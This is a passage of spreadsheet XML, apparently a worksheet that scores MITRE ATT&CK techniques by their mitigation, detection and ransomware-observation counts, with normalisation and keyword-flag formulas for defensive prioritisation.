        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT278" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU27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79" spans="1:47" ht="32.1">
      <c r="A279" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.4200000000000008E-2</v>
      </c>
      <c r="B279" s="25">
        <f>SUM(H279,M279,V279)*(1+SUM(AE279,AG279,AI279,AK279,AM279))</f>
        <v>0.34200000000000008</v>
      </c>
      <c r="C279" s="25" t="s">
        <v>1169</v>
      </c>
      <c r="D279" s="25" t="s">
        <v>271</v>
      </c>
      <c r="E279" s="25" t="s">
        <v>1170</v>
      </c>
      <c r="F279" s="51">
        <v>1</v>
      </c>
      <c r="G279" s="51">
        <v>1</v>
      </c>
      <c r="H279" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I279">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J279">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K279">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L279">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M279" s="25">
        <v>0</v>
      </c>
      <c r="N279" s="51">
        <v>0</v>
      </c>
      <c r="O279" s="51">
        <v>0</v>
      </c>
      <c r="P279" s="51">
        <v>1</v>
      </c>
      <c r="Q279" s="51">
        <v>0</v>
      </c>
      <c r="R279" s="52" t="s">
        <v>1171</v>
      </c>
      <c r="S279" s="51">
        <v>6</v>
      </c>
      <c r="T279" s="52" t="s">
        <v>1172</v>
      </c>
      <c r="U279" s="51">
        <v>10</v>
      </c>
      <c r="V279" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.15714285714285717</v>
      </c>
      <c r="W279">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>16</v>
      </c>
      <c r="X279">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Y279">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Z279">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA279">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB279">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC279" s="29" t="s">
        <v>1173</v>
      </c>
      <c r="AD279" s="25" t="str" cm="1">
        <f t="array" ref="AD279">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC279)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE279" s="25">
        <f>IF(AD279="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF279" s="25" t="str" cm="1">
        <f t="array" ref="AF279">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC279)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG279" s="25">
        <f>IF(AF279="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH279" s="25" t="str" cm="1">
        <f t="array" ref="AH279">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC279)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI279" s="25">
        <f>IF(AH279="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ279" s="25" t="str" cm="1">
        <f t="array" ref="AJ279">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC279)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK279" s="25">
        <f>IF(AJ279="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL279" s="25" t="str" cm="1">
        <f t="array" ref="AL279">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC279)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM279" s="25">
        <f>IF(AL279="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN279" s="60">
        <v>0</v>
      </c>
      <c r="AO279" s="51">
        <v>0</v>
      </c>
      <c r="AP279" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.4200000000000008E-2</v>
      </c>
      <c r="AQ279" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11400000000000003</v>
      </c>
      <c r="AR279" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11400000000000003</v>
      </c>
      <c r="AS279" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT279" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU27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80" spans="1:47">
      <c r="A280" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.9047619047619043E-2</v>
      </c>
      <c r="B280" s="25">
        <f>SUM(H280,M280,V280)*(1+SUM(AE280,AG280,AI280,AK280,AM280))</f>
        <v>0.25714285714285712</v>
      </c>
      <c r="C280" s="25" t="s">
        <v>1174</v>
      </c>
      <c r="D280" s="25" t="s">
        <v>88</v>
      </c>
      <c r="E280" s="25" t="s">
        <v>1175</v>
      </c>
      <c r="F280" s="51">
        <v>1</v>
      </c>
      <c r="G280" s="51">
        <v>1</v>
      </c>
      <c r="H280" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I280">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J280">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K280">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L280">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M280" s="25">
        <v>0</v>
      </c>
      <c r="N280" s="51">
        <v>0</v>
      </c>
      <c r="O280" s="51">
        <v>7</v>
      </c>
      <c r="P280" s="51">
        <v>0</v>
      </c>
      <c r="Q280" s="51">
        <v>0</v>
      </c>
      <c r="R280" s="52" t="s">
        <v>318</v>
      </c>
      <c r="S280" s="51">
        <v>2</v>
      </c>
      <c r="T280" s="51" t="s">
        <v>934</v>
      </c>
      <c r="U280" s="51">
        <v>11</v>
      </c>
      <c r="V280" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.15714285714285714</v>
      </c>
      <c r="W280">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X280">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y280">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z280">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>7</v>
      </c>
      <c r="AA280">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB280">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC280" s="29" t="s">
        <v>1176</v>
      </c>
      <c r="AD280" s="25" t="str" cm="1">
        <f t="array" ref="AD280">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC280)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE280" s="25">
        <f>IF(AD280="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF280" s="25" t="str" cm="1">
        <f t="array" ref="AF280">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC280)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG280" s="25">
        <f>IF(AF280="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH280" s="25" t="str" cm="1">
        <f t="array" ref="AH280">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC280)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI280" s="25">
        <f>IF(AH280="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ280" s="25" t="str" cm="1">
        <f t="array" ref="AJ280">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC280)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK280" s="25">
        <f>IF(AJ280="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL280" s="25" t="str" cm="1">
        <f t="array" ref="AL280">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC280)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM280" s="25">
        <f>IF(AL280="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN280" s="59">
        <v>1</v>
      </c>
      <c r="AO280" s="51">
        <v>1</v>
      </c>
      <c r="AP280" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.9047619047619043E-2</v>
      </c>
      <c r="AQ280" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.5714285714285701E-2</v>
      </c>
      <c r="AR280" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.5714285714285701E-2</v>
      </c>
      <c r="AS280" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT280" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU28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81" spans="1:47" ht="48">
      <c r="A281" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.4199999999999994E-2</v>
      </c>
      <c r="B281" s="25">
        <f>SUM(H281,M281,V281)*(1+SUM(AE281,AG281,AI281,AK281,AM281))</f>
        <v>0.34199999999999997</v>
      </c>
      <c r="C281" s="25" t="s">
        <v>1177</v>
      </c>
      <c r="D281" s="25" t="s">
        <v>124</v>
      </c>
      <c r="E281" s="25" t="s">
        <v>1178</v>
      </c>
      <c r="F281" s="51">
        <v>1</v>
      </c>
      <c r="G281" s="51">
        <v>1</v>
      </c>
      <c r="H281" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I281">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J281">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K281">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L281">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M281" s="25">
        <v>0</v>
      </c>
      <c r="N281" s="51">
        <v>0</v>
      </c>
      <c r="O281" s="51">
        <v>0</v>
      </c>
      <c r="P281" s="51">
        <v>3</v>
      </c>
      <c r="Q281" s="51">
        <v>2</v>
      </c>
      <c r="R281" s="52" t="s">
        <v>1179</v>
      </c>
      <c r="S281" s="51">
        <v>6</v>
      </c>
      <c r="T281" s="52" t="s">
        <v>673</v>
      </c>
      <c r="U281" s="51">
        <v>8</v>
      </c>
      <c r="V281" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.15714285714285714</v>
      </c>
      <c r="W281">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X281">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y281">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z281">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA281">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB281">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC281" s="29" t="s">
        <v>785</v>
      </c>
      <c r="AD281" s="25" t="str" cm="1">
        <f t="array" ref="AD281">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC281)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE281" s="25">
        <f>IF(AD281="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF281" s="25" t="str" cm="1">
        <f t="array" ref="AF281">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC281)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG281" s="25">
        <f>IF(AF281="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH281" s="25" t="str" cm="1">
        <f t="array" ref="AH281">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC281)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI281" s="25">
        <f>IF(AH281="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ281" s="25" t="str" cm="1">
        <f t="array" ref="AJ281">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC281)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK281" s="25">
        <f>IF(AJ281="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL281" s="25" t="str" cm="1">
        <f t="array" ref="AL281">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC281)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM281" s="25">
        <f>IF(AL281="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN281" s="52">
        <v>0</v>
      </c>
      <c r="AO281" s="51">
        <v>0</v>
      </c>
      <c r="AP281" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.4199999999999994E-2</v>
      </c>
      <c r="AQ281" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11399999999999999</v>
      </c>
      <c r="AR281" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11399999999999999</v>
      </c>
      <c r="AS281" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT281" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU28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82" spans="1:47" ht="32.1">
      <c r="A282" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.4199999999999994E-2</v>
      </c>
      <c r="B282" s="25">
        <f>SUM(H282,M282,V282)*(1+SUM(AE282,AG282,AI282,AK282,AM282))</f>
        <v>0.34199999999999997</v>
      </c>
      <c r="C282" s="25" t="s">
        <v>1180</v>
      </c>
      <c r="D282" s="25" t="s">
        <v>208</v>
      </c>
      <c r="E282" s="25" t="s">
        <v>1181</v>
      </c>
      <c r="F282" s="51">
        <v>1</v>
      </c>
      <c r="G282" s="51">
        <v>1</v>
      </c>
      <c r="H282" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I282">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J282">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K282">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L282">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M282" s="25">
        <v>0</v>
      </c>
      <c r="N282" s="51">
        <v>1</v>
      </c>
      <c r="O282" s="51">
        <v>2</v>
      </c>
      <c r="P282" s="51">
        <v>0</v>
      </c>
      <c r="Q282" s="51">
        <v>0</v>
      </c>
      <c r="R282" s="52" t="s">
        <v>1182</v>
      </c>
      <c r="S282" s="51">
        <v>6</v>
      </c>
      <c r="T282" s="52" t="s">
        <v>1183</v>
      </c>
      <c r="U282" s="51">
        <v>9</v>
      </c>
      <c r="V282" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.15714285714285714</v>
      </c>
      <c r="W282">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>15</v>
      </c>
      <c r="X282">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Y282">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Z282">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA282">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB282">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC282" s="29" t="s">
        <v>368</v>
      </c>
      <c r="AD282" s="25" t="str" cm="1">
        <f t="array" ref="AD282">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC282)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE282" s="25">
        <f>IF(AD282="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF282" s="25" t="str" cm="1">
        <f t="array" ref="AF282">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC282)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG282" s="25">
        <f>IF(AF282="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH282" s="25" t="str" cm="1">
        <f t="array" ref="AH282">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC282)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI282" s="25">
        <f>IF(AH282="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ282" s="25" t="str" cm="1">
        <f t="array" ref="AJ282">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC282)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK282" s="25">
        <f>IF(AJ282="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL282" s="25" t="str" cm="1">
        <f t="array" ref="AL282">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC282)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM282" s="25">
        <f>IF(AL282="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN282" s="52">
        <v>0</v>
      </c>
      <c r="AO282" s="51">
        <v>0</v>
      </c>
      <c r="AP282" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.4199999999999994E-2</v>
      </c>
      <c r="AQ282" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11399999999999999</v>
      </c>
      <c r="AR282" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11399999999999999</v>
      </c>
      <c r="AS282" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT282" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU28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83" spans="1:47">
      <c r="A283" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.080571428571428E-2</v>
      </c>
      <c r="B283" s="25">
        <f>SUM(H283,M283,V283)*(1+SUM(AE283,AG283,AI283,AK283,AM283))</f>
        <v>0.30805714285714281</v>
      </c>
      <c r="C283" s="25" t="s">
        <v>1184</v>
      </c>
      <c r="D283" s="25" t="s">
        <v>331</v>
      </c>
      <c r="E283" s="25" t="s">
        <v>1185</v>
      </c>
      <c r="F283" s="51">
        <v>1</v>
      </c>
      <c r="G283" s="51">
        <v>1</v>
      </c>
      <c r="H283" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I283">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J283">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K283">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L283">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
